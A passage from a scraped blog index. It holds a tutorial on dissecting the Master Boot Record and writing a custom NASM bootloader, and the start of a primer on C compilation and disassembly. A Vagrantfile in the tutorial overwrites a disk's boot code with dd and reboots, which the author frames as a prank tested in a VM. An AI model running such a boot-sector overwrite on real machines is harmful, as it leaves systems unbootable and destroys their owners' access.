RTFM.\nhttps://elixir.bootlin.com/linux/latest/source/kernel/audit.c\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.man7.org/linux/man-pages/man5/auditd.conf.5.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/chap-system_auditing\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2022/12/recording_system_events_with_auditd/","summary":"Audits are critical for system administrators to detect security violations and track security-relevant information on their systems. Anyone concerned about the security, stability, and proper operation of their Linux servers should conduct an audit.\nHow to do auditing in linux One simple way is to use the history command to observe the shell\u0026rsquo;s history, but this has many limitations. One of them is that this command is only applicable to the current user.","title":"Recording system events with auditd"},{"content":"Malware has been used numerous times by attackers to destroy a computer\u0026rsquo;s Master Boot Record, rendering it inoperable. By erasing the MBR, the machine is unable to load the operating system. There is no easy way to rewrite the Master Boot Record into place without an operating system, and the machine becomes completely useless and unrecoverable. In addition, many ransomwares infect the master boot record by overwriting it with malicious code. The system is then automatically restarted to allow the infection to take place. When the system restarts, the user is locked out, and the ransomware displays a note demanding payment. Simple money!\nTo understand how all of this is possible, and how an attacker can achieve it, we must first understand the MBR and the process of its execution.\nThe boot process The booting procedure of a system has become simpler over time, but this does not always imply that it is any easier. Every computer, big or small, goes through a start-up procedure known as the \u0026ldquo;Boot\u0026rdquo; process. Because different types of hardware operate in different ways, the boot procedure is heavily influenced by the type of CPU architecture and other hardware components.\nTo avoid confusion, I won\u0026rsquo;t go into great detail about each stage of the booting process. However, a typical linux booting procedure involves the following phases at a higher level:\nPower Up\nThis is the step where you press the power button. This triggers the BIOS 1 from motherboard\u0026rsquo;s flash memory to start executing it\u0026rsquo;s functions.\nPower On Self Test\nAfter BIOS is up and running, it initiates a quick self test to know if all the required hardware components are in working condition.\nFind a boot device\nThis step finds all the bootable devices from the earlier detected hard drives. The way this works is by checking the MBR (Master Boot Record) for each detected devices. MBR is refered to the first 512 bytes of any bootable device.\nLoad the MBR\nMBR is the first 512 bytes. These 512 bytes contains a bootloader, partition table and the magic number. This is loaded into ram and is responsible to read data from drives and start the operating system.\nLoad GRUB\nThis is a boot loader program which works in 2 stages. First stage is a small machine code binary on MBR. Its sole job is to locate the second stage boot loader and load it in memory. Once the second stage boot loader is in the memory, it presents the user with a graphical screen showing the different operating systems to choose from.\nKernel\nThe above OS selection decides what kernel and optional initramfs is to be loaded into memory. The kernel then initializes and configures the computer\u0026rsquo;s memory and configures the various hardware attached to the system, including all the I/O subsystems. After some more operations, the kernel is completely loaded into memory and is operational. It\u0026rsquo;s time to set up the user environment.\ninit\nThis is the first userspace program that is started by kernel. Now this starts and manages all the userspace processes like your web browser, file manager, web servers, etc.\nMBR and other little things Now that we are aware of how the boot procedure works, we can go on to the article\u0026rsquo;s main objective, the Master Boot Record. (but not this Master Boot Record)\nIf you\u0026rsquo;re not already aware, this is how a typical hard drive appears from the outside.\nThere are numerous components inside this small semi-metallic box that aid in its proper operation.\nBut we don\u0026rsquo;t need to know about all of these components; instead, we\u0026rsquo;ll concentrate on the disc-like structure in the centre. This is known as a platter. A platter is a single recording disc. A hard disc drive may have one or more platters.\nEach platter is divided into several circular tracks, and each track is further divided into several sectors. Each sector on a hard disc drive typically stores 512 bytes of user-accessible data.\nThe first 512 bytes (or first sector) of a hard drive is where the MBR is located. And since everything in Linux is a \u0026ldquo;file\u0026rdquo;, if we want to extract MBR data, all we have to do is to read the first 512 bytes of our bootable hard disk file and then write that content to another local file for further analysis. In most of the linux platforms, we can do this by dd 2 command.\ndd if=/dev/sda of=mbr.sample bs=512 count=1 The above command will read a 512-byte block (once) from /dev/sda and save it in the mbr.sample file. Then we can the check the type of this file using file command.\nfile mbr.sample ## Output # mbr.sample: x86 boot sector; partition 1: ID=0x83, active, starthead 32, startsector 2048, 2097152 sectors; partition 2: ID=0x8e, starthead 170, startsector 2099200, 41191424 sectors, code offset 0x63 An x86 boot sector is recognised in this file. Interestingly, it also lists the start head, start sector, total number of sectors, offset, and IDs of all the partitions. This was sufficient reason for me to dig up the file\u0026rsquo;s hexdump and understand how file command is able to gather all this information.\nhexdump -C mbr.sample Output:-\n00000000 eb 63 90 10 8e d0 bc 00 b0 b8 00 00 8e d8 8e c0 |.c..............| 00000010 fb be 00 7c bf 00 06 b9 00 02 f3 a4 ea 21 06 00 |...|.........!..| 00000020 00 be be 07 38 04 75 0b 83 c6 10 81 fe fe 07 75 |....8.u........u| 00000030 f3 eb 16 b4 02 b0 01 bb 00 7c b2 80 8a 74 01 8b |.........|...t..| 00000040 4c 02 cd 13 ea 00 7c 00 00 eb fe 00 00 00 00 00 |L.....|.........| 00000050 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00 |................| 00000060 00 00 00 00 ff fa 90 90 f6 c2 80 74 05 f6 c2 70 |...........t...p| 00000070 74 02 b2 80 ea 79 7c 00 00 31 c0 8e d8 8e d0 bc |t....y|..1......| 00000080 00 20 fb a0 64 7c 3c ff 74 02 88 c2 52 be 05 7c |. ..d|\u0026lt;.t...R..|| 00000090 b4 41 bb aa 55 cd 13 5a 52 72 3d 81 fb 55 aa 75 |.A..U..ZRr=..U.u| 000000a0 37 83 e1 01 74 32 31 c0 89 44 04 40 88 44 ff 89 |7...t21..D.@.D..| 000000b0 44 02 c7 04 10 00 66 8b 1e 5c 7c 66 89 5c 08 66 |D.....f..\\|f.\\.f| 000000c0 8b 1e 60 7c 66 89 5c 0c c7 44 06 00 70 b4 42 cd |..`|f.\\..D..p.B.| 000000d0 13 72 05 bb 00 70 eb 76 b4 08 cd 13 73 0d 5a 84 |.r...p.v....s.Z.| 000000e0 d2 0f 83 de 00 be 85 7d e9 82 00 66 0f b6 c6 88 |.......}...f....| 000000f0 64 ff 40 66 89 44 04 0f b6 d1 c1 e2 02 88 e8 88 |d.@f.D..........| 00000100 f4 40 89 44 08 0f b6 c2 c0 e8 02 66 89 04 66 a1 |.@.D.......f..f.| 00000110 60 7c 66 09 c0 75 4e 66 a1 5c 7c 66 31 d2 66 f7 |`|f..uNf.\\|f1.f.| 00000120 34 88 d1 31 d2 66 f7 74 04 3b 44 08 7d 37 fe c1 |4..1.f.t.;D.}7..| 00000130 88 c5 30 c0 c1 e8 02 08 c1 88 d0 5a 88 c6 bb 00 |..0........Z....| 00000140 70 8e c3 31 db b8 01 02 cd 13 72 1e 8c c3 60 1e |p..1......r...`.| 00000150 b9 00 01 8e db 31 f6 bf 00 80 8e c6 fc f3 a5 1f |.....1..........| 00000160 61 ff 26 5a 7c be 80 7d eb 03 be 8f 7d e8 34 00 |a.\u0026amp;Z|..}....}.4.| 00000170 be 94 7d e8 2e 00 cd 18 eb fe 47 52 55 42 20 00 |..}.......GRUB .| 00000180 47 65 6f 6d 00 48 61 72 64 20 44 69 73 6b 00 52 |Geom.Hard Disk.R| 00000190 65 61 64 00 20 45 72 72 6f 72 0d 0a 00 bb 01 00 |ead. Error......| 000001a0 b4 0e cd 10 ac 3c 00 75 f4 c3 00 00 00 00 00 00 |.....\u0026lt;.u........| 000001b0 00 00 00 00 00 00 00 00 70 7e 04 00 00 00 80 20 |........p~..... | 000001c0 21 00 83 aa 28 82 00 08 00 00 00 00 20 00 00 aa |!...(....... ...| 000001d0 29 82 8e fe ff ff 00 08 20 00 00 88 74 02 00 00 |)....... ...t...| 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa |..............U.| 00000200 Dissecting the Master Boot Record Without any knowledge of layout, simply looking at the hexdump output is not particularly helpful. Therefore, it is now necessary to understand the MBR layout.\nMBR consists of 3 parts - bootloader, partition table, and magic number.\nThe magic number is found in the final two bytes, as opposed to the regular userspace files. It is 55AA in the file, but be mindful of the processor\u0026rsquo;s endianness. Since my CPU is little endian, the leftmost bytes are read first. As a result, AA55 will become the magic number.\nAfter that is subtracted, we are left with 512-2 = 510 bytes. Out of these, the bootloader is stored in the first 446 bytes, and the partition tables are stored in the remaining 64 bytes. To evaluate these components separately, let\u0026rsquo;s extract them into distinct files using the same old dd command.\n## Bootlaoder dd if=mbr.sample of=mbr.bootloader bs=1 count=446 ## Partition table (skip first 446 bytes) dd if=mbr.sample of=mbr.partition_table bs=1 count=64 skip=446 ## magic (skip first 510 bytes) dd if=mbr.sample of=mbr.magic bs=1 count=2 skip=510 ## Check file types file * ## Output # mbr.bootloader: data # mbr.magic: BIOS (ia32) ROM Ext. # mbr.partition_table: 8086 relocatable (Microsoft) # mbr.sample: x86 boot sector; partition 1: ID=0x83, active, starthead 32, startsector 2048, 2097152 sectors; partition 2: ID=0x8e, starthead 170, startsector 2099200, 41191424 sectors, code offset 0x63 It\u0026rsquo;s fantastic that the file command can recognise each of these MBR components separately. Now with separate files, we can carefully examine the partition table and determine what data it can give us.\nhexdump -C -v mbr.partition_table Output:-\n00000000 80 20 21 00 83 aa 28 82 00 08 00 00 00 00 20 00 |. !...(....... .| 00000010 00 aa 29 82 8e fe ff ff 00 08 20 00 00 88 74 02 |..)....... ...t.| 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| The MBR system only supports 4 primary partitions since partition tables actually only contain 4 records. We must divide a primary partition into smaller partitions and keep a separate partition table inside of that primary partition if we want to construct more than four partitions. The term \u0026ldquo;Expanded partitions\u0026rdquo; is in fact used to describe these extended partitions. We can see from the result above that there are a total of 64 bytes, giving us a total of 64/4 = 16 bytes for each record. Let\u0026rsquo;s understand the layout of these 16 bytes and then we can analyze the partition table data using hexdump.\nSize (in bytes) Purpose 1 Boot indicator (0x80 for active and 0x00 for inactive) 1 partition start: head 1 partition start: sector 1 partition start: cylinder 1 Partition ID 1 partition end: head 1 partition end: sector 1 partition end: cylinder 4 Number of sectors before the beginning of this partition (sectors_before) 4 Number of sectors in this partition (number_of_sectors) There are 16 bytes in all of that. Now we know where the information that the file command was displaying previously comes from.\nBased on the information we have now, we can figure out few things on our own\u0026hellip;\n00000000 80 20 21 00 83 aa 28 82 00 08 00 00 00 00 20 00 |. !...(....... .| 00000010 00 aa 29 82 8e fe ff ff 00 08 20 00 00 88 74 02 |..)....... ...t.| 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| For example, this disk only has 2 partitions because the final 2 records are all zeros. Due to the \u0026lsquo;0x80\u0026rsquo; byte in the first records, the first partition is bootable. And the ID for that partition is 83. While the second partition is non bootable partition, and the ID of that partition is 82. If you want, you can even calculate the size of each partition with the help of other information present in these records.\nWe are now down to the first 446 bytes, which include the bootloader. The bootloader is simply a software that reads and loads other applications from the bootable partition.GRUB typically loads the second stage of itself from disk, however this is not a condition.There are bootloaders that load the kernel directly into memory or, even better, some of them are full-fledged application that just works. 3\nNote:- Although I won\u0026rsquo;t be discussing it today, you can use the ndisasm disassembler to disassemble the bootloader image.This will require for some knowledge of the interrupts and memory management in the BIOS, which is outside the scope of this blog.\nThat settles it; now that we are aware of what is contained within an MBR, why don\u0026rsquo;t we attempt to construct one?\nCreating your own bootloader To start, we\u0026rsquo;ll make a simple raw binary file and put AA55 in it. Keep in mind that this is the magic number that belongs in an MBR.\ndw 0xAA55 Save this file as custom bootloader.asm. After compiling it with the nasm compiler, the results should look like this.\n## Compile custom_bootloader.asm nasm -fbin custom_bootloader.asm -o custom_bootloader.bin ## Check the file type file rhel_magic_number custom_bootloader.bin ## Output # rhel_magic_number: ISO-8859 text, with no line terminators # custom_bootloader.bin: ISO-8859 text, with no line terminators ## Check hexdump hexdump -C custom_bootloader.bin ## Ouput # 00000000 55 aa |U.| # 00000002 We now have a 2 byte file containing the magic number. However, because the MBR is 512 bytes long, we must fill 510 more bytes. For the time being, let\u0026rsquo;s just fill it with zeros and see if it\u0026rsquo;s a valid MBR file.\ntimes 510 db 0 dw 0xAA55 The above code will write 0 510 times and then write AA55.\n## Compile custom_bootloader.asm nasm -fbin custom_bootloader.asm -o custom_bootloader.bin ## Check the file type file rhel_mbr custom_bootloader.bin ## Ouput # rhel_mbr: DOS/MBR boot sector # custom_bootloader.bin: DOS/MBR boot sector ## Check hexdump hexdump -C custom_bootloader.bin ## Ouput # 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| # * # 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa |..............U.| # 00000200 This is, as expected, a valid MBR file with no information about the partition table or the bootloader. Can we, however, use this to boot the system?\nLet\u0026rsquo;s make an attempt.\nI first tried without any mbr data to see what errors I would get when it fails.\nqemu-system-x86_64 And, as I was expecting, it said \u0026ldquo;no bootable device.\u0026rdquo;\nLet\u0026rsquo;s run the test again, but this time with the MBR file we made.\nIt did not give me the error this time. That must imply that our MBR is functional. Since it lacks bootloader code, it does nothing. However, it is not returning the same previous error.\nWe can now add new instructions to our assembly file. However, we must keep in mind that we do not exceed the file\u0026rsquo;s 512-byte limit. That means we\u0026rsquo;ll have to take care of the zeros we\u0026rsquo;re padding with. Because this is a very simple problem, there are special characters that can assist us in calculating the memory address of the beginning of the file and the current address in the file.\ntimes 510-($-$$) db 0 ;$ - Start addr; $$ - current addr dw 0xAA55 We can calculate the exact number of zeros required for padding using these special characters. Let\u0026rsquo;s compile it and put it to the test.\nnasm -fbin custom_bootloader.asm -o custom_bootloader.bin qemu-system-x86_64 custom_bootloader.bin This produces the same results as before, and the output file size remains 512 bytes. Let\u0026rsquo;s add some more instructions to help us write some text on the screen.\nUnlike userspace and kernelspace programs, we do not have any helper functions that can take a string and automatically print it to the screen. We\u0026rsquo;ll have to tell the BIOS to do what we want here. And the only way I\u0026rsquo;m aware of is through interrupts. It is the same facility that operating systems and application programmes use to access BIOS functions.\nHere is a list of common BIOS interrupts. Not all BIOS (especially older ones) support all of these interrupts. The basic idea of using interrupts is we place proper values in some specific registers, and then trigger the interrupt. The interrupt routine will then fetch the values from those registers and based on that, it\u0026rsquo;ll perform some action.\nAnyway, using the above table, I determined that we needed to use interrupt vector 10h (or 0x10) with interrupt vector 03h (or 0x03) in AH register. Consider it as invoking the 10h function with the parameter value 03h. This returns the cursor\u0026rsquo;s current position and shape.\nmov ah, 0x03; int 10h times 510-($-$$) db 0 dw 0xAA55 We can see that some initial bytes are written to the binary file after compiling and inspecting the hexdump\u0026hellip;. And, thanks to $ and $$, the file size remains 512 bytes.\n# Compiling the binary nasm -fbin custom_bootloader.asm -o custom_bootloader.bin ## Checking hexdump hexdump -C custom_bootloader.bin ## Output # 00000000 b8 03 00 cd 10 00 00 00 00 00 00 00 00 00 00 00 |................| # 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| # * # 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa |..............U.| # 00000200 This switches the BIOS to TTY mode, allowing me to print characters using the same interrupt 10h but with a different value in the ah register.\nmov ah, 0x03 int 10h mov ah, 0xE mov al, \u0026#39;H\u0026#39; int 0x10 mov al, \u0026#39;E\u0026#39; int 0x10 mov al, \u0026#39;Y\u0026#39; int 0x10 times 510-($-$$) db 0 dw 0xAA55 When we compile and run this with qemu, we get the message \u0026ldquo;HEY\u0026rdquo; printed on the screen.\nNow that we know how to write characters on the screen, let\u0026rsquo;s make a string and loop through it until the end, printing each character on the screen one by one using the same interrupt combination.\n; Setup TTY mode mov ax, 0x03 int 10h mov si, msg ; si register now points to msg mov ah, 0Eh ; Use write function from 10h interrupt .loop: lodsb ; load first char from msg and point to next char or al, al ; Check if end of string jz halt ; if end of string, jump to halt int 10h ; else, print char via interrupt jmp .loop ; loop halt: msg: db \u0026#34;Hack the world\u0026#34;, 0 times 510-($-$$) db 0 dw 0xAA55 Unfortunately, testing the above code does not produce the desired results, but instead produces some garbage values.\nFurther investigation revealed that our bootloader in memory is not properly aligned. This led me down another rabbit hole, this time about how the contents of the computer\u0026rsquo;s physical memory look when the BIOS jumps to my bootloader code. Here is a dedicated page on the same topic here which covers a lot of details about it.\nFor us, we need to add a few more instructions to our code to properly align it. Finally, our code will look like this.\nbits 16 ; BIOS works in 16 bit mode org 0x7c00 ; MBR is loaded at 0x7c00 memory location mov ax, 0x03 int 10h mov si, msg mov ah, 0Eh .loop: lodsb or al, al jz halt int 10h jmp .loop halt: cli ; disable further interrupts hlt ; halt msg: db \u0026#34;Hack the world!!\u0026#34;, 0 times 510-($-$$) db 0 dw 0xAA55 This time we get the desired result after compiling and testing the above. We successfully created a bootloader that prints some message on the screen.\nConclusions We know that a MBR sector is comprised of 3 parts:\nbootloader (446 bytes) partition table (64 bytes) magic number (2 bytes) And each component can be extracted separately and treated as a regular binary file. This means that we can create backups of only partition tables if necessary. Alternatively, we can replace the bootloader code with another code without affecting the partition table.(Obviously for fun; like a friendly joke, nothing malicious) 😈 😈\nWe know our above \u0026ldquo;Hack the World!!\u0026rdquo; code does not use all 510 bytes, so why not shrink it a little to fit in 446 bytes? This way we can protect the original partition table.\nbits 16 org 0x7c00 mov ax, 0x03 int 10h mov si, msg mov ah, 0Eh .loop: lodsb or al, al jz halt int 10h jmp .loop halt: cli hlt msg: db \u0026#34;Hack the world!!\u0026#34;, 0 times 446-($-$$) db 0 ; Just change 510 to 446 :) dw 0xAA55 This will generate the raw data file containing the bootloader program, which we can quickly test in a virtual machine.\nVagrant.configure(\u0026#34;2\u0026#34;) do |config| config.vm.box = \u0026#34;archlinux/archlinux\u0026#34; config.vm.box_check_update = true config.vm.provider \u0026#34;virtualbox\u0026#34; do |vb| vb.gui = true vb.memory = \u0026#34;512\u0026#34; end config.vm.provision \u0026#34;shell\u0026#34;, inline: \u0026lt;\u0026lt;-SHELL # Backup the original bootloader dd \\ if=/dev/sda \\ of=/vagrant/backedup_bootloader.bin \\ bs=1 \\ count=446 # Copy the fun bootloader to first 446 bytes of sda dd \\ if=/vagrant/custom_bootloader.bin \\ of=/dev/sda \\ bs=1 \\ count=446 # Reboot the system to see the effect reboot SHELL end The Vagrantfile above will launch a quick test VM. We just need to sit back and relax.\nAfter successful bootup and reboot, It displayed the expected message.\nhttps://en.wikipedia.org/wiki/BIOS\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.man7.org/linux/man-pages/man1/dd.1.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://forum.osdev.org/viewtopic.php?f=2\u0026amp;t=18763\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2022/09/fun-with-mbr/","summary":"Malware has been used numerous times by attackers to destroy a computer\u0026rsquo;s Master Boot Record, rendering it inoperable. By erasing the MBR, the machine is unable to load the operating system. There is no easy way to rewrite the Master Boot Record into place without an operating system, and the machine becomes completely useless and unrecoverable. In addition, many ransomwares infect the master boot record by overwriting it with malicious code.","title":"Fun with Master Boot Record"},{"content":"Steps to generate a binary When we write a program using a language like C, it is not C source code which really gets executed. This C code passes through many steps and finally a binary file is generated out of it. This binary file is what gets executed on any computer.\nThere are many steps through which a C code is converted into a binary file:-\nPre-processing Compilation Assemble Linking Let\u0026rsquo;s follow these steps one by one to understand what they do to the C code and how a binary is generated via this. To get started, we need a C program that we would want to convert into a binary.\n//file: hello_world.c #include \u0026lt;stdio.h\u0026gt; // main function int main() { printf(\u0026#34;Hello World\u0026#34;); // Print \u0026#34;Hello World\u0026#34; return 5; // Return with 5 return value } If you are even a bit familiar with C programs, you would understand that the above program will create a main() function, call printf() function to print Hello World string and finally return with a 5 return value.\nPre-processing Let\u0026rsquo;s see what we get after pre-processing this C program. With gcc this can be done via below command\ngcc -E hello_world.c -o hello_world.i This takes the provided C program and does many things to it, few of these are mentioned below.\nRemoves the comments. Replaces the #include statements with the actual file content. For example, #include\u0026lt;stdio.h\u0026gt; is replaced with stdio.h file contents. Compilation After pre-processing, the generated file is used to generate assembly instructions. These instructions are microprocessor (or CPU) specific. Microprocessor is a computer component that handles all kinds of conditional logic, arithmatic calculations and other logical activities.\nYou might have heard about few types of micro processor families like intel x86 and ARM.. but there are many more. Unfortunately, each family has their own instruction sets to perform different tasks.\nWe can convert our pre-processed code file to equivalent assembly code using gcc.\ngcc -S hello_world.i -o hello_world.s This will provide us with a hello_world.s file.\nfile hello_world.s # hello_world.s: assembler source, ASCII text This step produces an assembly language source code for my micro-processor family (intel x86-64). If you want to generate assembly code for other families (also called, architectures), you might want to look into cross-compilers\nThis assembly code is what get\u0026rsquo;s executed by the processor. If we look into this file, we will be able to see the assembly code for the C program we wrote.\ncat hello_world.s Output:\n.file \u0026#34;hello_world.c\u0026#34; .text .section .rodata .LC0: .string \u0026#34;Hello World\u0026#34; .text .globl main .type main, @function main: .LFB0: .cfi_startproc pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 movq %rsp, %rbp .cfi_def_cfa_register 6 leaq .LC0(%rip), %rax movq %rax, %rdi movl $0, %eax call printf@PLT movl $5, %eax popq %rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .ident \u0026#34;GCC: (GNU) 12.1.1 20220730\u0026#34; .section .note.GNU-stack,\u0026#34;\u0026#34;,@progbits This is what the intermediate code in assembly language looks like. We\u0026rsquo;ll talk more about this in later sections. For now, let\u0026rsquo;s move forward and see how a binary file is created from this assembly code.\nAssembling into binary We can convert the assembly code to binary file using gcc via the below command:-\ngcc -c hello_world.s -o hello_world.o This will generate the binary object file, which can be analyzed with tools like objdump and hexdump. This file is the binary file for the source code we wrote, but we need more than that for the program to actually execute on terminal with ./hello_world.o.\nLinking the binary This last step will take your obect file (.o files from last step) and produce either a library or an executable file. It replaces the references to undefined symbols with the correct addresses. There are many more things going in here other than this, so to keep it short and simple - this step will create your executable from your object file by linking it with other required files like standard libraries. Ultimately, this will generate the executable or library which we can use or distribute it.\nUsing gcc, we can achieve this with:-\n## -v option is just to print the verbose output. gcc -v hello_world.o -o hello_world.out After all these steps, we have our binary file and all other intermediate files.\nfile * # hello_world.c: C source, ASCII text # hello_world.i: C source, ASCII text # hello_world.o: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped # hello_world.out: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c6293fa95c56250957a3babeecd8d18fc463e7cf, for GNU/Linux 4.4.0, with debug_info, not stripped # hello_world.s: assembler source, ASCII text To summarize everything, the C program we write goes through various steps to generate an executable binary file. And this binary file is what executes on our machine\u0026hellip;.or in another words, this binary tells our processors about what job we want them to do.\nReverse Engineering?? Reverse Engineering is the process of figuring out how something works. This process can be applied to approximately anything even computer programs.\nIf we are provided with a compiled, assembled and linked binary file, we can apply the process of reverse engineering to understand what that program does. This skill can be useful for many tasks like generating keygens, patches, understanding low-level vulnerabilities, profiling applications, malware analysis, etc..\nSince assembly language is the closest human-readable language for any binary, we need to have a good understanding of that to perform good reverse engineering. Obviously this varies with compilers used and architecture for which the binary was compiled\u0026hellip; So we need might need to learn about how different compilers generate assembly code for different micro-processor families.\nMost of the times we are provided with the binary file for programs instead of the source code, therefore, we only have assembly representation to work from. However there are tools like ghidra that takes the compiled assembly code and give us a view of what the C code for that binary might look like. This is called decompilation.\nbinary \u0026lt;\u0026ndash;\u0026gt; assembly (assembly \u0026lt;\u0026ndash;\u0026gt; disassembly) At this point, we know about how a C program gets converted to a binary file after the complete compilation process. Let us understand more about the relation between a binary file and it\u0026rsquo;s assembly code.\nWe have already seen that the intermediate assembly code can be converted to binary file via assemblers (in our case, gcc assembler feature). The inverse can be done via disassemblers.\nA disassembler takes the binary file as input and read it\u0026rsquo;s contents and maps the binary values to it\u0026rsquo;s respective assembly instructions.\nb i n a r y v a l u e s b y t e p a i r s a s s e m b l y c o d e There are many disassemblers we can use like:-\nobjdump ghidra radare2 gdb hopper and many more Let\u0026rsquo;s try to disassemble our hello_world.out binary and see what it provides us.\nobjdump --disassemble hello_world.out | wc -l # 122 Objdump provides a lot of output for the disassembly of a simple \u0026ldquo;Hello Wold\u0026rdquo; program. This is because we linked the hello_world.o file to obtain a hello_world.out file. This new file has a lot of things that helps this to run on the machine with ./hello_world.out command.\nIf we check the unlined version of our binary, we\u0026rsquo;ll get a lot less output.\nobjdump --disassemble hello_world.o | wc -l # 16 ## Looking at the disassembled binary objdump --disassemble hello_world.o # 0000000000000000 \u0026lt;main\u0026gt;: # 0: 55 push %rbp # 1: 48 89 e5 mov %rsp,%rbp # 4: 48 8d 05 00 00 00 00 lea 0x0(%rip),%rax # b \u0026lt;main+0xb\u0026gt; # b: 48 89 c7 mov %rax,%rdi # e: b8 00 00 00 00 mov $0x0,%eax # 13: e8 00 00 00 00 call 18 \u0026lt;main+0x18\u0026gt; # 18: b8 05 00 00 00 mov $0x5,%eax # 1d: 5d pop %rbp # 1e: c3 ret The same results can be obtained from our linked binary, if we only ask objdump to disassemble main() function.\nobjdump --disassemble=main hello_world.out # 0000000000001139 \u0026lt;main\u0026gt;: # 1139: 55 push %rbp # 113a: 48 89 e5 mov %rsp,%rbp # 113d: 48 8d 05 c0 0e 00 00 lea 0xec0(%rip),%rax # 2004 \u0026lt;_IO_stdin_used+0x4\u0026gt; # 1144: 48 89 c7 mov %rax,%rdi # 1147: b8 00 00 00 00 mov $0x0,%eax # 114c: e8 df fe ff ff call 1030 \u0026lt;printf@plt\u0026gt; # 1151: b8 05 00 00 00 mov $0x5,%eax # 1156: 5d pop %rbp # 1157: c3 ret Ofcourse, few things are different like the numbers in first column (these numbers are offset values, we don\u0026rsquo;t need to understand them right now)\u0026hellip;. But if we focus only on the second column and third column which are hexa-decimal values or opcodes and assembly code/representation respectively.\nThe main difference between a .o and .out file is that the .o file is not yet linked to any platoform dependent libraries. Here is a good stackoverflow thread about the same topic.\nThe assembly code has a syntax structure, which is a good point to start understanding how they work. Each line in the above output contains 1 assembly instruction \u0026hellip; and every instruction is composed of either 1, 2 or 3 keywords. These can be represented in below syntax.\n## Syntax by Intel | Keyword1 | Keyword2 | Keyword3 | |--------------|------------|------------| | OPCODE | destination| source | or ## Syntax by AT\u0026amp;T | Keyword1 | Keyword2 | Keyword3 | |--------------|-----------|-------------| | OPCODE | source | destination | There are few other differences between these 2 syntaxes..but this does not change anything in logic or working of the binary. You can think of them as different kinds of representations for the same thing. Read more from here: AT\u0026amp;T Syntax versus Intel Syntax and here: StackOverflow - NASM (Intel) versus AT\u0026amp;T Syntax: what are the advantages?. I prefer to use Intel syntax and will be using that throughout this article.\nBy default, objdump provides AT\u0026amp;T syntax but you can explicitely ask it to provide the intel syntax using --disassembler-options=intel flag.\nobjdump --disassemble=main --disassembler-options=intel hello_world.out output\n0000000000001139 \u0026lt;main\u0026gt;: 1139: 55 push rbp 113a: 48 89 e5 mov rbp,rsp 113d: 48 8d 05 c0 0e 00 00 lea rax,[rip+0xec0] # 2004 \u0026lt;_IO_stdin_used+0x4\u0026gt; 1144: 48 89 c7 mov rdi,rax 1147: b8 00 00 00 00 mov eax,0x0 114c: e8 df fe ff ff call 1030 \u0026lt;printf@plt\u0026gt; 1151: b8 05 00 00 00 mov eax,0x5 1156: 5d pop rbp 1157: c3 ret The purpose of higher level languages like C is that we don\u0026rsquo;t have to deal with all this assembly code for all things. To effectively use assembly there are a lot of things we need to understand and think continously according to them. With higher level languages, we can write the code more easily and then pass that code to compiler, and that will generate a assembly code and binary file for us to use\u0026hellip;\nHeap, Stack and Registers Every C process (not program) use many things to work, 4 of them are - Heap, Stack, Registers and Instructions. We have just understood about the instructions in previous section, now let us start with others.\nHeap is one of the memory alocation strategy used for dynamic storage allocations, ie, allocating memory at run time. The actual working of the heap is a bit complex and is out of scope for this article. For now, keep in mind that any calls to malloc, calloc or any other similar kind of function will allocate memory in heap. All objects which have dynamic storage duration are suitable for heap.\nRegisters are small storage areas in the processors, which are used by instructions to store multiple values. They can store anything upto their size limits. Different architectures have different size of registers ranging from 8 bit to 64 bit registers. There are even 128, 256, and 512-bit registers. Here is a stackoverflow thread for the same.\nBack in early days (1972), Intel added few 8-bit general purpose registers to their microprocessors\u0026hellip;general purpose registers are used for general purposes like storing return values, temporary calculation results, etc..\n┌ │ ├ │ ├ │ ├ │ ├ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ A ─ B ─ C ─ D ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ ┤ │ ┤ │ ┤ │ ┤ Later these 8-bit registers were updated with 16-bit registers\u0026hellip; This was logically partitioned into two 8-bit registers, maybe to back-support the old systems/softwares that used needed 8 bit registers to work, Anyways, the new registers looked something like this\u0026hellip;\n◄ ┌ │ ├ │ ├ │ ├ │ └ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ 8 ─ ─ ─ ─ ─ - ─ ─ ─ ─ ─ b ─ A ─ B ─ C ─ D ─ i ─ H ─ H ─ H ─ H ─ t ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ► ─ ─ ─ ─ ─ ┬ │ ┼ │ ┼ │ ┼ │ ┴ ◄ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ 8 ─ ─ ─ ─ ─ - ─ ─ ─ ─ ─ b ─ A ─ B ─ C ─ D ─ i ─ L ─ L ─ L ─ L ─ t ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ► ┐ │ ┤ │ ┤ │ ┤ │ ┘ O R ◄ ┌ │ ├ │ ├ │ ├ │ └ ─ ─ ─ ─ 